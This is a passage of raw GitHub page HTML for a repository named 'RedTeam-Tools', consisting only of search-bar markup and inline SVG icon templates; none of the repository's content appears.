data-custom-scopes-path="/search/custom_scopes" 
data-delete-custom-scopes-csrf="HfXcBJoDaxVfhqdn45xFLds6p6oDvb76LOi6DtPWCUbp3jmVbEu2-YAZ4aQYM8AGMporxCbZRD5EZ04kNXBZvQ" data-max-custom-scopes="10" data-header-redesign-enabled="false" data-initial-value="" data-blackbird-suggestions-path="/search/suggestions" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" data-current-repository="A-poc/RedTeam-Tools" data-current-org="" data-current-owner="A-poc" data-logged-in="false" data-copilot-chat-enabled="false" data-nl-search-enabled="false" data-retain-scroll-position="true"> <div class="search-input-container search-with-dialog position-relative d-flex flex-row flex-items-center mr-4 rounded" data-action="click:qbsearch-input#searchInputContainerClicked" > <button type="button" class="header-search-button placeholder input-button form-control d-flex flex-1 flex-self-stretch flex-items-center no-wrap width-full py-0 pl-2 pr-0 text-left border-0 box-shadow-none" data-target="qbsearch-input.inputButton" aria-label="Search or jump to…" aria-haspopup="dialog" placeholder="Search or jump to..." 
data-hotkey=s,/ autocapitalize="off" data-analytics-event="{"location":"navbar","action":"searchbar","context":"global","tag":"input","label":"searchbar_input_global_navbar"}" data-action="click:qbsearch-input#handleExpand" > <div class="mr-2 color-fg-muted"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path> </svg> </div> <span class="flex-1" data-target="qbsearch-input.inputButtonText">Search or jump to...</span> <div class="d-flex" data-target="qbsearch-input.hotkeyIndicator"> <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg> </div> </button> <input type="hidden" name="type" class="js-site-search-type-field"> <div class="Overlay--hidden " data-modal-dialog-overlay> <modal-dialog data-action="close:qbsearch-input#handleClose cancel:qbsearch-input#handleClose" data-target="qbsearch-input.searchSuggestionsDialog" role="dialog" id="search-suggestions-dialog" aria-modal="true" aria-labelledby="search-suggestions-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto"> <h1 id="search-suggestions-dialog-header" class="sr-only">Search code, repositories, users, issues, pull requests...</h1> <div class="Overlay-body Overlay-body--paddingNone"> <div data-view-component="true"> <div class="search-suggestions position-fixed width-full color-shadow-large border color-fg-default color-bg-default overflow-hidden d-flex flex-column query-builder-container" style="border-radius: 12px;" 
data-target="qbsearch-input.queryBuilderContainer" hidden > <!-- '"` --><!-- </textarea></xmp> --></option></form><form id="query-builder-test-form" action="" accept-charset="UTF-8" method="get"> <query-builder data-target="qbsearch-input.queryBuilder" id="query-builder-query-builder-test" data-filter-key=":" data-view-component="true" class="QueryBuilder search-query-builder"> <div class="FormControl FormControl--fullWidth"> <label id="query-builder-test-label" for="query-builder-test" class="FormControl-label sr-only"> Search </label> <div class="QueryBuilder-StyledInput width-fit " data-target="query-builder.styledInput" > <span id="query-builder-test-leadingvisual-wrap" class="FormControl-input-leadingVisualWrap QueryBuilder-leadingVisualWrap"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search FormControl-input-leadingVisual"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path> </svg> </span> <div data-target="query-builder.styledInputContainer" class="QueryBuilder-StyledInputContainer"> <div aria-hidden="true" class="QueryBuilder-StyledInputContent" data-target="query-builder.styledInputContent" ></div> <div class="QueryBuilder-InputWrapper"> <div aria-hidden="true" class="QueryBuilder-Sizer" data-target="query-builder.sizer"></div> <input id="query-builder-test" name="query-builder-test" value="" autocomplete="off" type="text" role="combobox" spellcheck="false" aria-expanded="false" aria-describedby="validation-77f461ac-c330-44a2-b211-22549c9c3559" data-target="query-builder.input" data-action=" input:query-builder#inputChange blur:query-builder#inputBlur keydown:query-builder#inputKeydown focus:query-builder#inputFocus " data-view-component="true" class="FormControl-input QueryBuilder-Input FormControl-medium" /> </div> </div> 
<span class="sr-only" id="query-builder-test-clear">Clear</span> <button role="button" id="query-builder-test-clear-button" aria-labelledby="query-builder-test-clear query-builder-test-label" data-target="query-builder.clearButton" data-action=" click:query-builder#clear focus:query-builder#clearButtonFocus blur:query-builder#clearButtonBlur " variant="small" hidden="hidden" type="button" data-view-component="true" class="Button Button--iconOnly Button--invisible Button--medium mr-1 px-2 py-0 d-flex flex-items-center rounded-1 color-fg-muted"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x-circle-fill Button-visual"> <path d="M2.343 13.657A8 8 0 1 1 13.658 2.343 8 8 0 0 1 2.343 13.657ZM6.03 4.97a.751.751 0 0 0-1.042.018.751.751 0 0 0-.018 1.042L6.94 8 4.97 9.97a.749.749 0 0 0 .326 1.275.749.749 0 0 0 .734-.215L8 9.06l1.97 1.97a.749.749 0 0 0 1.275-.326.749.749 0 0 0-.215-.734L9.06 8l1.97-1.97a.749.749 0 0 0-.326-1.275.749.749 0 0 0-.734.215L8 6.94Z"></path> </svg> </button> </div> <template id="search-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path> </svg> </template> <template id="code-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path> </svg> </template> 
<template id="file-code-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file-code"> <path d="M4 1.75C4 .784 4.784 0 5.75 0h5.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v8.586A1.75 1.75 0 0 1 14.25 15h-9a.75.75 0 0 1 0-1.5h9a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 10 4.25V1.5H5.75a.25.25 0 0 0-.25.25v2.5a.75.75 0 0 1-1.5 0Zm1.72 4.97a.75.75 0 0 1 1.06 0l2 2a.75.75 0 0 1 0 1.06l-2 2a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734l1.47-1.47-1.47-1.47a.75.75 0 0 1 0-1.06ZM3.28 7.78 1.81 9.25l1.47 1.47a.751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018l-2-2a.75.75 0 0 1 0-1.06l2-2a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Zm8.22-6.218V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path> </svg> </template> <template id="history-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path> </svg> </template> <template id="repo-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path> </svg> </template> <template id="bookmark-icon"> <svg 
aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bookmark"> <path d="M3 2.75C3 1.784 3.784 1 4.75 1h6.5c.966 0 1.75.784 1.75 1.75v11.5a.75.75 0 0 1-1.227.579L8 11.722l-3.773 3.107A.751.751 0 0 1 3 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v9.91l3.023-2.489a.75.75 0 0 1 .954 0l3.023 2.49V2.75a.25.25 0 0 0-.25-.25Z"></path> </svg> </template> <template id="plus-circle-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-plus-circle"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm7.25-3.25v2.5h2.5a.75.75 0 0 1 0 1.5h-2.5v2.5a.75.75 0 0 1-1.5 0v-2.5h-2.5a.75.75 0 0 1 0-1.5h2.5v-2.5a.75.75 0 0 1 1.5 0Z"></path> </svg> </template> <template id="circle-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-dot-fill"> <path d="M8 4a4 4 0 1 1 0 8 4 4 0 0 1 0-8Z"></path> </svg> </template> <template id="trash-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-trash"> <path d="M11 1.75V3h2.25a.75.75 0 0 1 0 1.5H2.75a.75.75 0 0 1 0-1.5H5V1.75C5 .784 5.784 0 6.75 0h2.5C10.216 0 11 .784 11 1.75ZM4.496 6.675l.66 6.6a.25.25 0 0 0 .249.225h5.19a.25.25 0 0 0 .249-.225l.66-6.6a.75.75 0 0 1 1.492.149l-.66 6.6A1.748 1.748 0 0 1 10.595 15h-5.19a1.75 1.75 0 0 1-1.741-1.575l-.66-6.6a.75.75 0 1 1 1.492-.15ZM6.5 1.75V3h3V1.75a.25.25 0 0 0-.25-.25h-2.5a.25.25 0 0 0-.25.25Z"></path> </svg> </template> <template id="team-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-people"> <path d="M2 5.5a3.5 3.5 0 1 1 5.898 2.549 5.508 5.508 0 0 1 3.034 4.084.75.75 0 1 1-1.482.235 4 4 0 0 0-7.9 0 .75.75 0 0 1-1.482-.236A5.507 5.507 0 0 1 3.102 8.05 3.493 
3.493 0 0 1 2 5.5ZM11 4a3.001 3.001 0 0 1 2.22 5.018 5.01 5.01 0 0 1 2.56 3.012.749.749 0 0 1-.885.954.752.752 0 0 1-.549-.514 3.507 3.507 0 0 0-2.522-2.372.75.75 0 0 1-.574-.73v-.352a.75.75 0 0 1 .416-.672A1.5 1.5 0 0 0 11 5.5.75.75 0 0 1 11 4Zm-5.5-.5a2 2 0 1 0-.001 3.999A2 2 0 0 0 5.5 3.5Z"></path> </svg> </template> <template id="project-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path> </svg> </template> <template id="pencil-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-pencil"> <path d="M11.013 1.427a1.75 1.75 0 0 1 2.474 0l1.086 1.086a1.75 1.75 0 0 1 0 2.474l-8.61 8.61c-.21.21-.47.364-.756.445l-3.251.93a.75.75 0 0 1-.927-.928l.929-3.25c.081-.286.235-.547.445-.758l8.61-8.61Zm.176 4.823L9.75 4.81l-6.286 6.287a.253.253 0 0 0-.064.108l-.558 1.953 1.953-.558a.253.253 0 0 0 .108-.064Zm1.238-3.763a.25.25 0 0 0-.354 0L10.811 3.75l1.439 1.44 1.263-1.263a.25.25 0 0 0 0-.354Z"></path> </svg> </template> <template id="copilot-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copilot"> <path d="M7.998 15.035c-4.562 0-7.873-2.914-7.998-3.749V9.338c.085-.628.677-1.686 1.588-2.065.013-.07.024-.143.036-.218.029-.183.06-.384.126-.612-.201-.508-.254-1.084-.254-1.656 0-.87.128-1.769.693-2.484.579-.733 1.494-1.124 2.724-1.261 1.206-.134 2.262.034 
2.944.765.05.053.096.108.139.165.044-.057.094-.112.143-.165.682-.731 1.738-.899 2.944-.765 1.23.137 2.145.528 2.724 1.261.566.715.693 1.614.693 2.484 0 .572-.053 1.148-.254 1.656.066.228.098.429.126.612.012.076.024.148.037.218.924.385 1.522 1.471 1.591 2.095v1.872c0 .766-3.351 3.795-8.002 3.795Zm0-1.485c2.28 0 4.584-1.11 5.002-1.433V7.862l-.023-.116c-.49.21-1.075.291-1.727.291-1.146 0-2.059-.327-2.71-.991A3.222 3.222 0 0 1 8 6.303a3.24 3.24 0 0 1-.544.743c-.65.664-1.563.991-2.71.991-.652 0-1.236-.081-1.727-.291l-.023.116v4.255c.419.323 2.722 1.433 5.002 1.433ZM6.762 2.83c-.193-.206-.637-.413-1.682-.297-1.019.113-1.479.404-1.713.7-.247.312-.369.789-.369 1.554 0 .793.129 1.171.308 1.371.162.181.519.379 1.442.379.853 0 1.339-.235 1.638-.54.315-.322.527-.827.617-1.553.117-.935-.037-1.395-.241-1.614Zm4.155-.297c-1.044-.116-1.488.091-1.681.297-.204.219-.359.679-.242 1.614.091.726.303 1.231.618 1.553.299.305.784.54 1.638.54.922 0 1.28-.198 1.442-.379.179-.2.308-.578.308-1.371 0-.765-.123-1.242-.37-1.554-.233-.296-.693-.587-1.713-.7Z"></path><path d="M6.25 9.037a.75.75 0 0 1 .75.75v1.501a.75.75 0 0 1-1.5 0V9.787a.75.75 0 0 1 .75-.75Zm4.25.75v1.501a.75.75 0 0 1-1.5 0V9.787a.75.75 0 0 1 1.5 0Z"></path> </svg> </template> <template id="copilot-error-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copilot-error"> <path d="M16 11.24c0 .112-.072.274-.21.467L13 9.688V7.862l-.023-.116c-.49.21-1.075.291-1.727.291-.198 0-.388-.009-.571-.029L6.833 5.226a4.01 4.01 0 0 0 .17-.782c.117-.935-.037-1.395-.241-1.614-.193-.206-.637-.413-1.682-.297-.683.076-1.115.231-1.395.415l-1.257-.91c.579-.564 1.413-.877 2.485-.996 1.206-.134 2.262.034 2.944.765.05.053.096.108.139.165.044-.057.094-.112.143-.165.682-.731 1.738-.899 2.944-.765 1.23.137 2.145.528 2.724 1.261.566.715.693 1.614.693 2.484 0 .572-.053 1.148-.254 1.656.066.228.098.429.126.612.012.076.024.148.037.218.924.385 1.522 1.471 1.591 
2.095Zm-5.083-8.707c-1.044-.116-1.488.091-1.681.297-.204.219-.359.679-.242 1.614.091.726.303 1.231.618 1.553.299.305.784.54 1.638.54.922 0 1.28-.198 1.442-.379.179-.2.308-.578.308-1.371 0-.765-.123-1.242-.37-1.554-.233-.296-.693-.587-1.713-.7Zm2.511 11.074c-1.393.776-3.272 1.428-5.43 1.428-4.562 0-7.873-2.914-7.998-3.749V9.338c.085-.628.677-1.686 1.588-2.065.013-.07.024-.143.036-.218.029-.183.06-.384.126-.612-.18-.455-.241-.963-.252-1.475L.31 4.107A.747.747 0 0 1 0 3.509V3.49a.748.748 0 0 1 .625-.73c.156-.026.306.047.435.139l14.667 10.578a.592.592 0 0 1 .227.264.752.752 0 0 1 .046.249v.022a.75.75 0 0 1-1.19.596Zm-1.367-.991L5.635 7.964a5.128 5.128 0 0 1-.889.073c-.652 0-1.236-.081-1.727-.291l-.023.116v4.255c.419.323 2.722 1.433 5.002 1.433 1.539 0 3.089-.505 4.063-.934Z"></path> </svg> </template> <template id="workflow-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-workflow"> <path d="M0 1.75C0 .784.784 0 1.75 0h3.5C6.216 0 7 .784 7 1.75v3.5A1.75 1.75 0 0 1 5.25 7H4v4a1 1 0 0 0 1 1h4v-1.25C9 9.784 9.784 9 10.75 9h3.5c.966 0 1.75.784 1.75 1.75v3.5A1.75 1.75 0 0 1 14.25 16h-3.5A1.75 1.75 0 0 1 9 14.25v-.75H5A2.5 2.5 0 0 1 2.5 11V7h-.75A1.75 1.75 0 0 1 0 5.25Zm1.75-.25a.25.25 0 0 0-.25.25v3.5c0 .138.112.25.25.25h3.5a.25.25 0 0 0 .25-.25v-3.5a.25.25 0 0 0-.25-.25Zm9 9a.25.25 0 0 0-.25.25v3.5c0 .138.112.25.25.25h3.5a.25.25 0 0 0 .25-.25v-3.5a.25.25 0 0 0-.25-.25Z"></path> </svg> </template> <template id="book-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book"> <path d="M0 1.75A.75.75 0 0 1 .75 1h4.253c1.227 0 2.317.59 3 1.501A3.743 3.743 0 0 1 11.006 1h4.245a.75.75 0 0 1 .75.75v10.5a.75.75 0 0 1-.75.75h-4.507a2.25 2.25 0 0 0-1.591.659l-.622.621a.75.75 0 0 1-1.06 0l-.622-.621A2.25 2.25 0 0 0 5.258 13H.75a.75.75 0 0 1-.75-.75Zm7.251 10.324.004-5.073-.002-2.253A2.25 2.25 0 0 0 5.003 
2.5H1.5v9h3.757a3.75 3.75 0 0 1 1.994.574ZM8.755 4.75l-.004 7.322a3.752 3.752 0 0 1 1.992-.572H14.5v-9h-3.495a2.25 2.25 0 0 0-2.25 2.25Z"></path> </svg> </template> <template id="code-review-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code-review"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v8.5A1.75 1.75 0 0 1 14.25 13H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 14.543V13H1.75A1.75 1.75 0 0 1 0 11.25v-8.5C0 1.784.784 1 1.75 1ZM1.5 2.75v8.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-8.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Zm5.28 1.72a.75.75 0 0 1 0 1.06L5.31 7l1.47 1.47a.751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018l-2-2a.75.75 0 0 1 0-1.06l2-2a.75.75 0 0 1 1.06 0Zm2.44 0a.75.75 0 0 1 1.06 0l2 2a.75.75 0 0 1 0 1.06l-2 2a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L10.69 7 9.22 5.53a.75.75 0 0 1 0-1.06Z"></path> </svg> </template> <template id="codespaces-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-codespaces"> <path d="M0 11.25c0-.966.784-1.75 1.75-1.75h12.5c.966 0 1.75.784 1.75 1.75v3A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25Zm2-9.5C2 .784 2.784 0 3.75 0h8.5C13.216 0 14 .784 14 1.75v5a1.75 1.75 0 0 1-1.75 1.75h-8.5A1.75 1.75 0 0 1 2 6.75Zm1.75-.25a.25.25 0 0 0-.25.25v5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-5a.25.25 0 0 0-.25-.25Zm-2 9.5a.25.25 0 0 0-.25.25v3c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25v-3a.25.25 0 0 0-.25-.25Z"></path><path d="M7 12.75a.75.75 0 0 1 .75-.75h4.5a.75.75 0 0 1 0 1.5h-4.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path> </svg> </template> <template id="comment-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon 
octicon-comment"> <path d="M1 2.75C1 1.784 1.784 1 2.75 1h10.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 13.25 12H9.06l-2.573 2.573A1.458 1.458 0 0 1 4 13.543V12H2.75A1.75 1.75 0 0 1 1 10.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h4.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path> </svg> </template> <template id="comment-discussion-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-comment-discussion"> <path d="M1.75 1h8.5c.966 0 1.75.784 1.75 1.75v5.5A1.75 1.75 0 0 1 10.25 10H7.061l-2.574 2.573A1.458 1.458 0 0 1 2 11.543V10h-.25A1.75 1.75 0 0 1 0 8.25v-5.5C0 1.784.784 1 1.75 1ZM1.5 2.75v5.5c0 .138.112.25.25.25h1a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h3.5a.25.25 0 0 0 .25-.25v-5.5a.25.25 0 0 0-.25-.25h-8.5a.25.25 0 0 0-.25.25Zm13 2a.25.25 0 0 0-.25-.25h-.5a.75.75 0 0 1 0-1.5h.5c.966 0 1.75.784 1.75 1.75v5.5A1.75 1.75 0 0 1 14.25 12H14v1.543a1.458 1.458 0 0 1-2.487 1.03L9.22 12.28a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215l2.22 2.22v-2.19a.75.75 0 0 1 .75-.75h1a.25.25 0 0 0 .25-.25Z"></path> </svg> </template> <template id="organization-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-organization"> <path d="M1.75 16A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0h8.5C11.216 0 12 .784 12 1.75v12.5c0 .085-.006.168-.018.25h2.268a.25.25 0 0 0 .25-.25V8.285a.25.25 0 0 0-.111-.208l-1.055-.703a.749.749 0 1 1 .832-1.248l1.055.703c.487.325.779.871.779 1.456v5.965A1.75 1.75 0 0 1 14.25 16h-3.5a.766.766 0 0 1-.197-.026c-.099.017-.2.026-.303.026h-3a.75.75 0 0 1-.75-.75V14h-1v1.25a.75.75 0 0 1-.75.75Zm-.25-1.75c0 .138.112.25.25.25H4v-1.25a.75.75 0 0 1 .75-.75h2.5a.75.75 0 0 1 .75.75v1.25h2.25a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25h-8.5a.25.25 0 0 0-.25.25ZM3.75 6h.5a.75.75 0 0 1 0 
1.5h-.5a.75.75 0 0 1 0-1.5ZM3 3.75A.75.75 0 0 1 3.75 3h.5a.75.75 0 0 1 0 1.5h-.5A.75.75 0 0 1 3 3.75Zm4 3A.75.75 0 0 1 7.75 6h.5a.75.75 0 0 1 0 1.5h-.5A.75.75 0 0 1 7 6.75ZM7.75 3h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1 0-1.5ZM3 9.75A.75.75 0 0 1 3.75 9h.5a.75.75 0 0 1 0 1.5h-.5A.75.75 0 0 1 3 9.75ZM7.75 9h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1 0-1.5Z"></path> </svg> </template> <template id="rocket-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-rocket"> <path d="M14.064 0h.186C15.216 0 16 .784 16 1.75v.186a8.752 8.752 0 0 1-2.564 6.186l-.458.459c-.314.314-.641.616-.979.904v3.207c0 .608-.315 1.172-.833 1.49l-2.774 1.707a.749.749 0 0 1-1.11-.418l-.954-3.102a1.214 1.214 0 0 1-.145-.125L3.754 9.816a1.218 1.218 0 0 1-.124-.145L.528 8.717a.749.749 0 0 1-.418-1.11l1.71-2.774A1.748 1.748 0 0 1 3.31 4h3.204c.288-.338.59-.665.904-.979l.459-.458A8.749 8.749 0 0 1 14.064 0ZM8.938 3.623h-.002l-.458.458c-.76.76-1.437 1.598-2.02 2.5l-1.5 2.317 2.143 2.143 2.317-1.5c.902-.583 1.74-1.26 2.499-2.02l.459-.458a7.25 7.25 0 0 0 2.123-5.127V1.75a.25.25 0 0 0-.25-.25h-.186a7.249 7.249 0 0 0-5.125 2.123ZM3.56 14.56c-.732.732-2.334 1.045-3.005 1.148a.234.234 0 0 1-.201-.064.234.234 0 0 1-.064-.201c.103-.671.416-2.273 1.15-3.003a1.502 1.502 0 1 1 2.12 2.12Zm6.94-3.935c-.088.06-.177.118-.266.175l-2.35 1.521.548 1.783 1.949-1.2a.25.25 0 0 0 .119-.213ZM3.678 8.116 5.2 5.766c.058-.09.117-.178.176-.266H3.309a.25.25 0 0 0-.213.119l-1.2 1.95ZM12 5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path> </svg> </template> <template id="shield-check-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield-check"> <path d="m8.533.133 5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 
1.217-1.667l5.25-1.68a1.748 1.748 0 0 1 1.066 0Zm-.61 1.429.001.001-5.25 1.68a.251.251 0 0 0-.174.237V7c0 1.36.275 2.666 1.057 3.859.784 1.194 2.121 2.342 4.366 3.298a.196.196 0 0 0 .154 0c2.245-.957 3.582-2.103 4.366-3.297C13.225 9.666 13.5 8.358 13.5 7V3.48a.25.25 0 0 0-.174-.238l-5.25-1.68a.25.25 0 0 0-.153 0ZM11.28 6.28l-3.5 3.5a.75.75 0 0 1-1.06 0l-1.5-1.5a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215l.97.97 2.97-2.97a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path> </svg> </template> <template id="heart-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-heart"> <path d="m8 14.25.345.666a.75.75 0 0 1-.69 0l-.008-.004-.018-.01a7.152 7.152 0 0 1-.31-.17 22.055 22.055 0 0 1-3.434-2.414C2.045 10.731 0 8.35 0 5.5 0 2.836 2.086 1 4.25 1 5.797 1 7.153 1.802 8 3.02 8.847 1.802 10.203 1 11.75 1 13.914 1 16 2.836 16 5.5c0 2.85-2.045 5.231-3.885 6.818a22.066 22.066 0 0 1-3.744 2.584l-.018.01-.006.003h-.002ZM4.25 2.5c-1.336 0-2.75 1.164-2.75 3 0 2.15 1.58 4.144 3.365 5.682A20.58 20.58 0 0 0 8 13.393a20.58 20.58 0 0 0 3.135-2.211C12.92 9.644 14.5 7.65 14.5 5.5c0-1.836-1.414-3-2.75-3-1.373 0-2.609.986-3.029 2.456a.749.749 0 0 1-1.442 0C6.859 3.486 5.623 2.5 4.25 2.5Z"></path> </svg> </template> <template id="server-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-server"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 